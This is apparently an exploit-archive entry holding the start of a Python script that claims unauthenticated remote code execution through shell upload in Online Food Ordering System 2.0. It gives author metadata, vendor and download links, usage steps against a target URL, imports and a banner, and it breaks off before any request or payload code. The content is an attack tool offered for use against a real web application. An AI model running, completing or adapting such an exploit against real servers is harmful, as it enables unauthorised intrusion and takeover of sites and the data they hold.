Authored by Abdullah Khawaja

Online Food Ordering System version 2.0 remote shell upload exploit.

# Exploit Title: Online Food Ordering System 2.0 -  Unauthenticated Remote Code Execution
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: 2021-09-19
# Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip
# Version: 2.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Online Food Ordering System 2.0 - Unauthenticated Remote Code Execution

#Step 1: run the exploit in python with this command: python3 OFOS_v2.0.py
#Step 2: Input the URL of the vulnerable application: Example: http://192.168.10.6/fos/


import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)





header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawajan'+Style.RESET_ALL

print(Style.BRIGHT+" Online Food Ordering System v2.0")
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)

print(r"""
______ _______ ________
___ //_/__ /_______ ___ _______ ______(_)_____ _
__ ,< __ __ __ `/_ | /| / / __ `/____ /_ __ `/
_ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ /
/_/ |_| /_/ /_/__,_/ ____/|__/ __,_/ ___ / __,_/
/___/
abdullahkhawaja.com
""")



GREEN = '